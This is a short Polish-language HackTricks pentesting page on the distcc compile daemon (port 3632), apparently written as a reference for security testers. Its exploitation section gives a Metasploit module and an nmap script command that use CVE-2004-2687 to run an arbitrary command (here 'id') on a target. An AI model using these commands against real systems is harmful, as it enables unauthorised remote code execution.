tip

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Ucz się i ćwicz Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Wsparcie dla HackTricks

Podstawowe informacje

Distcc to narzędzie, które poprawia proces kompilacji, wykorzystując nieużywaną moc obliczeniową innych komputerów w sieci. Gdy distcc jest skonfigurowany na maszynie, ta maszyna jest w stanie rozdzielać swoje zadania kompilacji do innego systemu. Ten system odbierający musi działać z demonem distccd i musi mieć zainstalowany kompatybilny kompilator, aby przetworzyć wysłany kod.

Domyślny port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Eksploatacja

Sprawdź, czy jest podatny na CVE-2004-2687, aby wykonać dowolny kod:

bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Nie sądzę, żeby shodan wykrywał tę usługę.

Resources

Post stworzony przez Álex B (@r1p)

tip

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Ucz się i ćwicz Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Wsparcie dla HackTricks